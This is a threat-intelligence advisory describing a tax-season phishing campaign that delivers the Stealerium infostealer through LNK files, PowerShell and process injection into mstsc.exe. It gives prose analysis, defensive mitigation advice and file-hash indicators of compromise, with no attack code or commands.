Skip to main content

Threat Actors are Targeting US Tax-Session with new Tactics of Stealerium-infostealer

Medium
Published: Wed Apr 30 2025 (04/30/2025, 17:22:40 UTC)
Source: AlienVault OTX General

Description

Cybercriminals are exploiting the US tax season to deploy Stealerium malware, targeting citizens through sophisticated phishing campaigns. The attack utilizes deceptive email attachments with malicious LNK files, leading to the execution of PowerShell scripts and the download of a PyInstaller-packaged executable. This payload injects into mstsc.exe and deploys Stealerium, an information-stealing malware that exfiltrates sensitive data from browsers, cryptocurrency wallets, and popular applications. The malware employs anti-analysis techniques, creates a hidden directory, and registers with a command and control server. It steals credentials from various sources, including browsers, gaming platforms, and messaging apps, while also capturing webcam images and Wi-Fi passwords.

AI-Powered Analysis

AILast updated: 07/02/2025, 00:25:37 UTC

Technical Analysis

The Stealerium-infostealer campaign is a sophisticated malware threat exploiting the US tax season to target individuals primarily in the United States through phishing emails. The attack vector involves sending deceptive emails containing malicious LNK (Windows shortcut) files as attachments. When a victim opens the LNK file, it triggers the execution of a PowerShell script that downloads a PyInstaller-packaged executable payload. This payload performs process injection into mstsc.exe, the Microsoft Terminal Services Client process, a legitimate Windows process, to evade detection and maintain persistence on the infected system. The injected malware, Stealerium, is an information stealer designed to exfiltrate a broad range of sensitive data, including credentials stored in web browsers, cryptocurrency wallets, gaming platforms, messaging applications, Wi-Fi passwords, and even webcam images. Stealerium employs anti-analysis techniques to hinder forensic investigation and detection, creates hidden directories to conceal its components, and communicates with a command and control (C2) server to receive instructions and exfiltrate stolen data. The campaign leverages social engineering tactics tied to the US tax season to increase the likelihood of user interaction and infection. Although no specific software versions are listed as affected, the infection relies heavily on user interaction with phishing emails and execution of malicious attachments. There are no known public exploits or patches currently available. Indicators of compromise include multiple file hashes associated with the malware components. The campaign’s use of process injection and anti-analysis techniques complicates detection and remediation efforts, increasing the potential dwell time and damage caused by the malware.

Potential Impact

For European organizations, the direct impact of this threat is currently limited since the campaign targets US tax season victims. However, the underlying tactics and malware capabilities pose significant risks if adapted to European tax seasons or financial events. The malware’s ability to steal credentials, capture webcam images, and exfiltrate sensitive information could lead to identity theft, financial fraud, corporate espionage, and privacy violations within European contexts. Organizations in Europe with employees handling sensitive financial data, cryptocurrency trading, or using remote desktop services (mstsc.exe) are at risk of lateral movement or credential compromise if infected endpoints connect to corporate networks. The use of process injection and anti-analysis techniques complicates detection, potentially increasing dwell time and damage. Additionally, phishing campaigns exploiting tax-related themes could be localized to European tax seasons, broadening the threat landscape. Overall, the malware could undermine the confidentiality, integrity, and availability of critical systems and data if it spreads beyond individual victims to organizational environments in Europe.

Mitigation Recommendations

1. Deploy advanced email filtering solutions capable of detecting and quarantining phishing emails with suspicious attachments, particularly LNK files and PowerShell scripts. 2. Enforce strict attachment handling policies that block or sandbox executable content and shortcut files in emails to prevent accidental execution. 3. Implement Endpoint Detection and Response (EDR) tools that can detect process injection, anomalous behavior of mstsc.exe, and misuse of PowerShell commands. 4. Use application whitelisting to restrict execution of unauthorized PyInstaller-packaged executables and unknown binaries. 5. Conduct targeted user awareness training focusing on phishing risks, especially during tax seasons or financial events, emphasizing the dangers of opening unexpected attachments. 6. Monitor network traffic for unusual command and control (C2) communications and data exfiltration patterns, particularly from endpoints running mstsc.exe. 7. Audit and restrict Remote Desktop Protocol (RDP) usage and credentials, enforcing multi-factor authentication (MFA) to reduce the risk of lateral movement. 8. Apply strict privilege management to limit malware’s ability to create hidden directories or modify system processes. 9. Integrate threat intelligence feeds and indicators of compromise (IOCs), including the provided file hashes, into security monitoring and detection tools. 10. Conduct regular security assessments and phishing simulation exercises to improve organizational resilience against similar campaigns.

Need more detailed analysis?Get Pro

Technical Details

Author
AlienVault
Tlp
white
References
["https://www.seqrite.com/blog/threat-actors-are-targeting-us-tax-session-with-new-tactics-of-stealerium-infostealer/"]
Adversary
null
Pulse Id
68125c60e131717220211bb5
Threat Score
null

Indicators of Compromise

Hash

ValueDescriptionCopy
hashe9d3e2dd2788c322ffd2c9defddf7728
hash10f217c72f62aed40957c438b865f0bcebc7e42a5e947051edee1649adf0cbf2
hash31705d906058e7324027e65ce7f4f7a30bcf6c30571aa3f020e91678a22a835a
hash48328ce3a4b2c2413acb87a4d1f8c3b7238db826f313a25173ad5ad34632d9d7
hash6a9889fee93128a9cdcb93d35a2fec9c6127905d14c0ceed14f5f1c4f58542b8
hashff5e3e3bf67d292c73491fab0d94533a712c2935bb4a9135546ca4a416ba8ca1

Threat ID: 6839e730182aa0cae2b929df

Added to database: 5/30/2025, 5:13:20 PM

Last enriched: 7/2/2025, 12:25:37 AM

Last updated: 7/26/2025, 3:11:51 PM

Views: 7

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

External Links

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats